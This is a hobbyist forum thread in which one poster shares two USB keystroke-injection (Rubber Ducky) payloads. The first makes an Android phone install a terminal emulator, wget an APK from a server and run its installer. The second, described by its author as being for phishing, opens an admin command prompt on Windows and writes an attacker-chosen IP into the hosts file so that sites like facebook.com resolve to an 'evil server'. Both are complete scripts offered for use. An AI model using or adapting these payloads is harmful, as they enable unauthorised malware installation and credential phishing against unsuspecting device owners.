KoryusaiKun

Just copy and paste it into some think like notepad++

Hi Guys n' Girls, Here's my first payload in a while. What it dose is it opens the Play Store, Search's for terminal emulator, installs it form the store, opens it. Now wgets a file ( I used kos's AntiGuard.apk hosted locally, its the apk i had to hand :) ) then takes you to the install wizard, installs it, then runs it. All in about 20 Seconds. :) It could be quicker, this should work on most devices 4.0 and above i have only tryed it on my Samsung galaxy note II N7100 running android v4.1.1. You may just have to tweek a few things. Like the download URL and the file URI. Here is a demo as promised: This script was very annoying solely because of launching the android install wizard. If you use it please say thanks. REM ---------------------------------------------------- REM Terminal emulator wget install and run V1.0 REM Tested on Samsung Galaxy note II Android V4.1.1 REM Koryusai-Kun REM ---------------------------------------------------- DELAY 3000 DELAY 100 ESCAPE ESCAPE ESCAPE ESCAPE ESCAPE ESCAPE REM open google search CTRL z DELAY 1200 REM open play store STRING play store DELAY 1000 DOWN DOWN DOWN DOWN ENTER DELAY 2000 REM Start Search for 'Terminal Emulator' STRING t DELAY 75 STRING e DELAY 75 STRING r DELAY 75 STRING m DELAY 75 STRING i DELAY 75 STRING n DELAY 75 STRING a DELAY 75 STRING l emulator DELAY 500 ENTER REM Select 'Terminal Emulator', Install and open DELAY 1000 DOWN DOWN DELAY 50 ENTER DELAY 300 DOWN RIGHT ENTER DELAY 500 DOWN DOWN ENTER DELAY 300 ENTER DELAY 2000 DOWN DOWN RIGHT ENTER DELAY 800 REM Change Dir to /mnt/sdcard/ STRING cd .. DELAY 50 ENTER STRING cd .. DELAY 50 ENTER STRING cd mnt DELAY 50 ENTER STRING cd sdcard DELAY 50 ENTER DELAY 50 REM wget the file and open the android package install wizard STRING wget http://192.168.1.103/AntiGuard.apk; am start -a android.intent.action.MAIN -n com.android.packageinstaller/.PackageInstallerActivity -d file:////mnt//sdcard//AntiGuard.apk ENTER REM Go through the install then open the application DELAY 2500 DOWN DELAY 200 DOWN DELAY 200 ENTER DELAY 1500 DOWN DELAY 500 DOWN DELAY 500 DOWN DELAY 500 ENTER[/CODE]

No problem mate, hope it works

You replace [WEBSITE_ADDRESS] with the website like www.facebook.com and the second with facebook.com then you put the evil server ip where [EVIL_SERVER_IP] is heres an example: ... REM ---[END]---------------------------------------------- DELAY 300 REM ---[Inject into the host file]------------------------ STRING copy con inject.bat ENTER STRING SET NEWLINE=^& echo. ENTER ENTER STRING FIND /C /I "www.facebook.com" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^127.0.0.1 www.facebook.com>>%WINDIR%\system32\drivers\etc\hosts ENTER ENTER STRING FIND /C /I "facebook.com" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^127.0.0.1 facebook.com>>%WINDIR%\system32\drivers\etc\hosts ENTER CONTROL z ENTER STRING inject.bat ENTER REM ---[END]---------------------------------------------- ...

Hi everyone, This is my first post and first script for the rubber duck. I have not yet tested this script as i am still waiting to recive it here in the UK. I got it from when i was talking to my friend about something he called desktop phishing it basicly replaces say facebooks or anyother sites ip with your chosen server's ip in the host file. Anyway heres the script: REM Author: .:Koryusai-Kun:. REM Description: Used for phishing, it add's an ip of your choosing to the hosts file on windows REM Description: so when the user types into there web browser for example www.facebook.com it REM Description: insted of going to the proper ip it gose to the one in the host file your evil one. REM Description: you need to add the www. version and with out it as well. REM ---[Start CMD as administrator]----------------------- GUI DELAY 50 STRING cmd DELAY 150 MENU DELAY 75 STRING a Enter DELAY 200 LEFT ENTER STRING cls ENTER REM ---[END]---------------------------------------------- DELAY 300 REM ---[Inject into the host file]------------------------ STRING copy con inject.bat ENTER STRING SET NEWLINE=^& echo. ENTER ENTER STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts ENTER ENTER STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts ENTER CONTROL z ENTER STRING inject.bat ENTER REM ---[END]---------------------------------------------- DELAY 200 STRING exit ENTER